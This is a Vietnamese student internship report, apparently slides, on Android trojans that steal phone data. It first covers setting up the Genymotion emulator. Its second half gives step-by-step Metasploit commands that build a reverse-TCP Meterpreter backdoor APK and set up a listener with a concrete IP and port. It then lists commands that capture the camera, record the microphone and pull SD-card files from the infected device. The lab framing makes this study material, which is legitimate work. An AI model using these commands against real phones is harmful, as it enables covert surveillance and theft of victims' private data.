mã độc

1. Athena
TRUNG TÂM ĐÀO TẠO QUẢNG TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ
Báo cáo thực tập :
Nghiên cứu các Trojan, Malware cho phép đánh
cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài
GVHD: Võ Đỗ Thắng
Sinh viên: Trần Minh Tân
Báo cáo Tuần 3:
Phần 1:Giả lập Android ảo
Phần 2:Tạo mã độc xâm nhập Android
TP.HCM, ngày 04 tháng 08 năm 2014

2. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 2
Phần 1:Giả lập Android ảo bằng Genymotion
Genymotion là phần mềm giúp tạo các máy ảo Android trên PC để có thể thoải mái cài và sử
dụng app từ Google Play. Chúng ta cũng được phép truy cập vào những thành phần hệ thống
khác, ví dụ như homescreen, phần cài đặt, thanh thông báo... y hệt như trên thiết bị di động, và
lại hoàn toàn miễn phí.
Genymotion thực chất sử dụng VirtualBox để tạo ra các máy ảo, tuy nhiên nó sẽ giúp chúng ta
đơn giản được nhiều bước thiết lập. Genymotion được viết nên chủ yếu để các lập trình viên
kiểm tra phần mềm của mình trước khi đưa Google Play, nhưng chúng ta hoàn toàn có thể dùng
nó cho nhu cầu chạy app thông thường cũng được.
Genyra đời mục đích chính là để cho mọi ng trải nghiệm 1 chiếc điện thoại thật 1 cách tốt nhất :
+ Người chưa bao giờ thấy cái điện thoại Android và muốn tập xài thử
+ Những người có máy thật muốn cài + chạy thử ứng dụng trước khi cài vào máy (đề phòng
virus,app lừa đảo)
+ Lập trình viên test thử ứng dụng của họ viết.
+ Giải trí cơ bản với game nhỏ
Geny Motion có rất nhiều ưu điểm :
- Hỗ trợ OpenGL 2.0 nên xử lí đồ họa, chơi game thì k cần hỏi ( nhưng chưa ổn định lắm, nhiều
game bị văng)
- Cài được ứng dụng, game, vào CH Play vô tư.
- Hiệu ứng chuyển mượt hơn Android X86 nhiều.
- Hỗ trợ đúng độ phân giải của 1 máy điện thoại thật ( galaxy S4,HTC One, Xperia Z)
- Tự xoay màn hình với ứng dụng cần xoay ( như chơi chém quả hoặc AngryBird )
- Có giả lập định vị GPS, giả lập Pin, giả lập Camera trước/sau
- Kết nối Eclipse để lập trình cực kì đơn giản, chỉ cần trỏ tới thư mục sdk là xong
Cài đặt Genymotion:
Đầu tiên bạn vào trang http://www.genymotion.com/, tạo một tài khoản. Sau khi đăng nhập
thành công bạn download phiên bản Windows 32/64 bits (with VirtualBox)

3. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 3
Khi đã tải và cài đặt xong Genymotion, hãy chạy ứng dụng này lên. Chúng ta sẽ đi qua một số
bước thiết lập như sau:
Đăng nhập vào ứng dụng Genymotion bằng tài khoản mà bạn mới vừa đăng kí ở trên.

4. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 4
Bạn sẽ được hỏi về việc chọn thiết bị giả lập môi trường Android ảo. Có rất nhiều máy ảo, ví dụ
như HTC One, Xperia Z, Samsung Galaxy S4 cho đến các máy Nexus, có cả một số tablet ở đây
nữa. Chọn lấy máy nào đó bạn thích, rồi tiếp tục nhấn nút Add và nút Next. Đợi cho máy ảo tải
về, có thể sẽ hơi lâu đấy vì đến một hai trăm MB lận. Nên chọn những máy ảo có chữ "with
Google Apps" để có sẵn những kho Google Play
Sau khi tải về xong, hãy nhấn đúp vào máy ảo bạn tính sử dụng. Một hộp thoại thông báo sẽ xuất
hiện, ở hộp thoại "Path to Android SDK", hãy trỏ đường dẫn đến thư mục Android SDK mà bạn
mới vừa tải về ở trên. Lưu ý là phải trỏ đúng vào thư mục có chữ sdk bên trong nữa nhé, đến khi
nào dòng chữ "ABD from Android Developer Tools successfully found là được". Nhấn OK để
hoàn tất

5. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 5
Quay trở lại giao diện chính của Genymotion, nhấp vào máy ảo mà bạn muốn chạy. Chờ một lát
là máy sẽ xuất hiện lên như hình bên dưới. Tiếp đó bạn có thể dùng chuột để tương tác với máy
ảo Android, đăng nhập tài khoản Google, thiết lập màn hình, tải app, nghịch app, vào phần
settings...

6. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 6

7. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 7
Phần 2: Tạo mã độc xâm nhập Android
Ở phần này mình sẽ dùng máy Kali Linux làm máy tấn công và dùng Genymotion tạo android ảo
làm môi trường bị tấn công.
Ta có thể sử dụng lệnh ifconfig để xem IP của máy Kali
Sau khi biết IP của máy tấn công ta vào phần chính tạo backdoor và xâm nhập điều khiển
android
Gõ dòng lệnh:
Msfpayload android/meterpreter/reverse_tcp lhost=<IP> lport=<Port> R >
/root/Desktop/files.apk
IP: là IP của Kali Linux
Port: số port bạn có thể chọn bất kì, sao cho thỏa quy tắt đặt port

8. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 8
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp
backdoor
Tiếp theo, gõ lệnh msfconsole Metasploit

9. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 9
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set lport 8080 – nhập port giống với port khi tạo payload ở trên.
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

10. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 10
Thử với một máy Xperia Z giả lập, tải về files.apk, cài đặt:
Khi tiến hành cài đặt file.apk ta thấy ứng dụng có các quyền sau:

11. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 11
- Đọc trạng thái và nhận dạng của điện thoại
- Gửi tin nhắn SMS, nhận văn bản SMS
- Chụp ảnh và quay video
- Ghi âm
- Đọc danh sách liên hệ, nhật kí cuộc gọi, ghi âm nhật kí cuộc gọi

12. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 12
- Sửa hoặc xóa nội dung thẻ SD của bạn
- .........
Sau khi cài đặt xong
Sau đó mở ứng dung MainActivity

13. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 13
Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:

14. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 14
Dùng lệnh “help” đê biết những lệnh tấn công android
 Sử dụng camera:
Để xem danh sách camera, nhập webcam_list

15. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 15
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách
camera ở phần trước. Ví dụ như sau:
File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root
của máy

16. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 16
 Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
 Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

17. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 17
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard

18. Báo cáo thực tâp:
Nghiên cứu các Trojan, Malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên
điện thoại sử dụng Android và gửi ra ngoài.
Sinh viên: Trần Minh Tân
Trang 18
Dùng lệnh cd /sdcard/Download để vào thư mục
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh
Download App.apk
Và file này sẽ được tải về thư mục root của máy Kali
Chúc các bạn thực hành tốt!!!^^